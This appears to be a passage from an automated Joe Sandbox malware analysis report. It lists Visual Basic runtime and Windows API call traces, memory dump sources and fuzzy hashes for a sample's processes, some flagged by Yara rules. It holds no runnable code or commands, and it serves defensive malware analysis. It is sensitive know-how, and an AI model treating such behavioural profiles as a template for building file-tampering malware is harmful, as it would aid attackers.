                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fprintf_l
                                                                                                                                                            • String ID: $%s$@%s
                                                                                                                                                            • API String ID: 3906573944-834177443
                                                                                                                                                            • Opcode ID: feba8c984e859516ce7d7ba68ce52cbf17dee13cb0948ba7e8d14a171e00cc57
                                                                                                                                                            • Instruction ID: 2964e854a3c66bce898133ab1a239caff317a7ec27fe64cf16a839a2a5c18ace
                                                                                                                                                            • Opcode Fuzzy Hash: feba8c984e859516ce7d7ba68ce52cbf17dee13cb0948ba7e8d14a171e00cc57
                                                                                                                                                            • Instruction Fuzzy Hash: 0C01717254028CAADB21EEB5CD46EEE7FE8FF52708F040411FA20D61A3E222D6589B11
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EE2E8: _swprintf.LIBCMT ref: 008EE30E
                                                                                                                                                              • Part of subcall function 008EE2E8: _strlen.LIBCMT ref: 008EE32F
                                                                                                                                                              • Part of subcall function 008EE2E8: SetDlgItemTextW.USER32(?,0091E274,?), ref: 008EE38F
                                                                                                                                                              • Part of subcall function 008EE2E8: GetWindowRect.USER32(?,?), ref: 008EE3C9
                                                                                                                                                              • Part of subcall function 008EE2E8: GetClientRect.USER32(?,?), ref: 008EE3D5
                                                                                                                                                            • GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                            • SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 2622349952-4108050209
                                                                                                                                                            • Opcode ID: f42224bee156d52d348d9f9e3f2e61dda7adb1e1bc742a26afa9181647742b2c
                                                                                                                                                            • Instruction ID: 256ad6bccea4303dc6410ff7eb1b0f6be520e9977ca127894298486334dcef00
                                                                                                                                                            • Opcode Fuzzy Hash: f42224bee156d52d348d9f9e3f2e61dda7adb1e1bc742a26afa9181647742b2c
                                                                                                                                                            • Instruction Fuzzy Hash: AAF03C701483CCAADF151F66980DAEA3BA9FB56348F048614FD48A5AE1CB78C990AB50
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 004156CA
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004157B7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000003), ref: 004157C8
                                                                                                                                                            • #616.MSVBVM60(00000000), ref: 004157CB
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004157D6
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,00000000), ref: 004157DD
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 004157FF
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415824
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000004,?), ref: 00415839
                                                                                                                                                            • #618.MSVBVM60(00000000), ref: 0041583C
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415847
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 0041584A
                                                                                                                                                            • __vbaStrMove.MSVBVM60(00000000), ref: 00415865
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00415879
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 0041588E
                                                                                                                                                            • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00415898
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00415855
                                                                                                                                                              • Part of subcall function 0040EAB0: #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0040EB1A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
                                                                                                                                                              • Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
                                                                                                                                                              • Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
                                                                                                                                                              • Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158D0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158DB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0000,?), ref: 004158EC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004158F7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00415907
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0041590C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415915
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041591A
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00415932
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415941
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 0041594D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00415957
                                                                                                                                                            • #525.MSVBVM60(00001000), ref: 00415962
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041596D
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159A3
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004159AC
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159B4
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004159BD
                                                                                                                                                            • #525.MSVBVM60(?), ref: 004159E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004159F4
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004159F9
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00415A02
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415A0A
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415A13
                                                                                                                                                            • #594.MSVBVM60(0000000A), ref: 00415A37
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415A40
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00415A5C
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415A86
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415AAF
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00415ABD
                                                                                                                                                            • __vbaFpUI1.MSVBVM60 ref: 00415ADF
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415AF7
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415B1F
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415B6D
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415B79
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • #593.MSVBVM60(0000000A), ref: 00415BB3
                                                                                                                                                            • __vbaFpI4.MSVBVM60 ref: 00415BD5
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00415BE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00415BF4
                                                                                                                                                            • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00415C0C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C17
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00415C23
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C42
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00415C51
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C55
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00415C5E
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C63
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C6C
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00415C70
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00415C73
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00415C7C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,00415D0C), ref: 00415CE6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CF5
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFA
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415CFF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00415D04
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00415D28
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                                                                                            • String ID: 0000
                                                                                                                                                            • API String ID: 292954213-211534962
                                                                                                                                                            • Opcode ID: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction ID: 53a986e52e39fbf970cbf615d3a1ec69ca294c6c8782ac2c6b5e72a9cd1184f1
                                                                                                                                                            • Opcode Fuzzy Hash: 7c5e828ce8de4e18a03661d5433b5bafc26df1f9f217d06a2eccdd31b2b4187d
                                                                                                                                                            • Instruction Fuzzy Hash: C0122DB1E00248DFDB14DBE4DD89ADDBBB5FF88301F10412AE506A72A0DB745985CF59
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409C6C,?,00000000), ref: 004115AE
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115DB
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115E7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115F3
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00411602
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411621
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411630
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?), ref: 00411644
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00411652
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411662
                                                                                                                                                            • #570.MSVBVM60(00000000), ref: 00411669
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 00411676
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(00404B24), ref: 004116AD
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 004116B4
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004116BF
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116CF
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004116DA
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004116EA
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004116F7
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041170C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00411720
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 00411735
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000), ref: 0041173C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041175E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,00000000,004025E6), ref: 0041178B
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,00000000,004025E6), ref: 00411792
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117A9
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 004117B0
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117DB
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(?,00000000), ref: 004117E6
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 004117F6
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00411803
                                                                                                                                                            • __vbaI2I4.MSVBVM60 ref: 00411832
                                                                                                                                                            • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041183B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041186A
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411879
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041188D
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041189B
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118AD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118B8
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411911
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041191E
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041192E
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041193B
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411979
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411984
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411994
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119A1
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119B1
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119BE
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E0
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E7
                                                                                                                                                            • #648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A16
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A25
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A39
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A47
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A57
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A5E
                                                                                                                                                            • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A71
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A85
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A93
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AA5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AB0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B09
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B16
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B26
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B33
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B71
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B7C
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B8C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B99
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BA9
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BB6
                                                                                                                                                            • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BD0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BEC
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BFC
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C03
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406BF8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C19
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C24
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C31
                                                                                                                                                            • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C47
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C56
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C5F
                                                                                                                                                            • #600.MSVBVM60(00004008,00000000), ref: 00411C85
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411CE8), ref: 00411CBD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CC6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CCF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CD8
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CE1
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411CFF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                                                                                            • String ID: E
                                                                                                                                                            • API String ID: 1020712489-3568589458
